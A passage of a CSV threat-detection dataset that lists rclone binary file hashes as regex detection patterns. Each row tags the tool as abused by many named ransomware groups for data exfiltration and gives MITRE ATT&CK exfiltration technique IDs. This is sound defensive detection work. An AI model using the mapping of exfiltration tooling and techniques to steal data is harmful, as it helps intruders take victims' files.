"*30d8f383f5472499fe1b395778196adb4ad6b000245b0c4786c398f3291f78aa*",".{0,1000}30d8f383f5472499fe1b395778196adb4ad6b000245b0c4786c398f3291f78aa.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*30e21bf4f47fa0edf53e738c13fdc4ee0a22f1b544165cbef1d362a25c1714c9*",".{0,1000}30e21bf4f47fa0edf53e738c13fdc4ee0a22f1b544165cbef1d362a25c1714c9.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*310cc90d4dc88a16e78873ceb1eb4e337e8039ec392df36073900b766585d0fb*",".{0,1000}310cc90d4dc88a16e78873ceb1eb4e337e8039ec392df36073900b766585d0fb.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*310e8f12c406cfe608fd6feec36bdb122180c3e13a179eb638593bf97b79fc9f*",".{0,1000}310e8f12c406cfe608fd6feec36bdb122180c3e13a179eb638593bf97b79fc9f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*3149fa9e7dcbe7b1992fb9475f76fd2d0ebad88318c9497fd34ced76b3c9150d*",".{0,1000}3149fa9e7dcbe7b1992fb9475f76fd2d0ebad88318c9497fd34ced76b3c9150d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*315aa5d2bb34c286245719163ffb168ef69e17c1f2fd0d4a9f7b0feb203d1d53*",".{0,1000}315aa5d2bb34c286245719163ffb168ef69e17c1f2fd0d4a9f7b0feb203d1d53.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*31c80fc12c2b391726f2a026981e0ce53bf6e68e55e4288f2b2662445d667ef5*",".{0,1000}31c80fc12c2b391726f2a026981e0ce53bf6e68e55e4288f2b2662445d667ef5.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*31fb21714d9ecb2e14dd5f34680bcbb1167cfc72d6433e193d061a9bc34b27c5*",".{0,1000}31fb21714d9ecb2e14dd5f34680bcbb1167cfc72d6433e193d061a9bc34b27c5.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*31fb7bc782823a725a7fc61e590911ddeac1989e10ab67fe5bba42c355d58b7f*",".{0,1000}31fb7bc782823a725a7fc61e590911ddeac1989e10ab67fe5bba42c355d58b7f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*321889f1b67fe66ee689b320e977646ddec0544fc89a23ad54e49408f7a4ae5e*",".{0,1000}321889f1b67fe66ee689b320e977646ddec0544fc89a23ad54e49408f7a4ae5e.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*32bc7de6f818df84a75f7ed501f1a152bb7a606687cd700b0144719261e3524d*",".{0,1000}32bc7de6f818df84a75f7ed501f1a152bb7a606687cd700b0144719261e3524d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*331052f70446cec6cc6392f80aac15a71b4e987b506b5ec3e6aada2b555a5ed9*",".{0,1000}331052f70446cec6cc6392f80aac15a71b4e987b506b5ec3e6aada2b555a5ed9.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*333c5aa4c44f10b270cfd2c4d2bd58ec2615cd8874a9e8896c05ea3810b50395*",".{0,1000}333c5aa4c44f10b270cfd2c4d2bd58ec2615cd8874a9e8896c05ea3810b50395.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*333fe7eb77d75398f57ac89dff603d71f9fe0857decee22e276a5734ea11b6ac*",".{0,1000}333fe7eb77d75398f57ac89dff603d71f9fe0857decee22e276a5734ea11b6ac.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*335e0c71b9818e5d688121452eadca3107ade9e60a36af0328e2843a70b2ebfb*",".{0,1000}335e0c71b9818e5d688121452eadca3107ade9e60a36af0328e2843a70b2ebfb.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*33604e221e6a0b033d4f00192bac45ed68d4f29fe1be7c14314ea6e6add7f2cb*",".{0,1000}33604e221e6a0b033d4f00192bac45ed68d4f29fe1be7c14314ea6e6add7f2cb.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*33ab89888c82d2e34bf39998f3070105b6d67911dbf89084fa185a0058e70692*",".{0,1000}33ab89888c82d2e34bf39998f3070105b6d67911dbf89084fa185a0058e70692.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*33b86805dca512c7216444a881630170042d43acabc30cfd17ce4f1f95318bcc*",".{0,1000}33b86805dca512c7216444a881630170042d43acabc30cfd17ce4f1f95318bcc.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*33e707f51a0012e333c2646c6b1458f389b5192bbfcced6b41ca1c3725b53a98*",".{0,1000}33e707f51a0012e333c2646c6b1458f389b5192bbfcced6b41ca1c3725b53a98.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*340371f94604e6771cc4a2c91e37d1bf00a524deab520340440fb0968e783f63*",".{0,1000}340371f94604e6771cc4a2c91e37d1bf00a524deab520340440fb0968e783f63.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*3435ba98d798b679b5b6dac4b04fd440389f1a3a4992ac998fe5231b2a83cbe4*",".{0,1000}3435ba98d798b679b5b6dac4b04fd440389f1a3a4992ac998fe5231b2a83cbe4.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*3445e757daa58d7e316d8d5bd308bccb43bcaf8504e17305a7c849b919a52d99*",".{0,1000}3445e757daa58d7e316d8d5bd308bccb43bcaf8504e17305a7c849b919a52d99.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*3458ddb17264d13bba09748cf14ea009b123f67823d1d5b7e6f8b0e8edbd238b*",".{0,1000}3458ddb17264d13bba09748cf14ea009b123f67823d1d5b7e6f8b0e8edbd238b.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*345f591a27c4b776215371a38f0ad8159357d30e9c1860c420a7eab8b5f0f63c*",".{0,1000}345f591a27c4b776215371a38f0ad8159357d30e9c1860c420a7eab8b5f0f63c.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*34710e9813ebda068adcec9296582c8396c1576532a77e86cca9245c549e6eac*",".{0,1000}34710e9813ebda068adcec9296582c8396c1576532a77e86cca9245c549e6eac.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*348f4866ac76baf0405695404432c5192faed33da7b8faea07947ba7427c688c*",".{0,1000}348f4866ac76baf0405695404432c5192faed33da7b8faea07947ba7427c688c.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*34b0ca12dcc9c13b405e6428926e48d33e3bbca4e2341eca7e9dce8ac13837e7*",".{0,1000}34b0ca12dcc9c13b405e6428926e48d33e3bbca4e2341eca7e9dce8ac13837e7.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*34b5f52047741c7bbf54572c02cc9998489c4736a753af3c99255296b1af125d*",".{0,1000}34b5f52047741c7bbf54572c02cc9998489c4736a753af3c99255296b1af125d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*34cb5687aff755ad7a3d1069b3cb0f5dd0b5b592b4d539ecd6c6a82599131ec7*",".{0,1000}34cb5687aff755ad7a3d1069b3cb0f5dd0b5b592b4d539ecd6c6a82599131ec7.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*351a2dd0dff54c031a54ea2d2ec8dee2f6f9325ddfd85cf3c10472e68f21e178*",".{0,1000}351a2dd0dff54c031a54ea2d2ec8dee2f6f9325ddfd85cf3c10472e68f21e178.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*357799ea43b606f6a5dfc27dc1310f47041bc34692b956401e22210496cd2cc5*",".{0,1000}357799ea43b606f6a5dfc27dc1310f47041bc34692b956401e22210496cd2cc5.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*35aac6d3ab27419d02271d75a4cacd7f51fbf5244eb87c75c2e38dddc46e3af6*",".{0,1000}35aac6d3ab27419d02271d75a4cacd7f51fbf5244eb87c75c2e38dddc46e3af6.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*368a22aa636e65268cc2073d41a5d2a2b163de580dc72d57239f561da6603b6f*",".{0,1000}368a22aa636e65268cc2073d41a5d2a2b163de580dc72d57239f561da6603b6f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*3697258decc0f5c953d11873d12e8fe86bbef7d3dd033bd38a57ddcb60fae93e*",".{0,1000}3697258decc0f5c953d11873d12e8fe86bbef7d3dd033bd38a57ddcb60fae93e.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*36977be1450de456579fc31a1afd86ed716fbb9a0c7d1c1b854b34152b3ac161*",".{0,1000}36977be1450de456579fc31a1afd86ed716fbb9a0c7d1c1b854b34152b3ac161.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*36dc83f98c27d4afc1e0a28b47aa176cd1bb1abcd4b5ed7e4ee6e430625d7fac*",".{0,1000}36dc83f98c27d4afc1e0a28b47aa176cd1bb1abcd4b5ed7e4ee6e430625d7fac.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
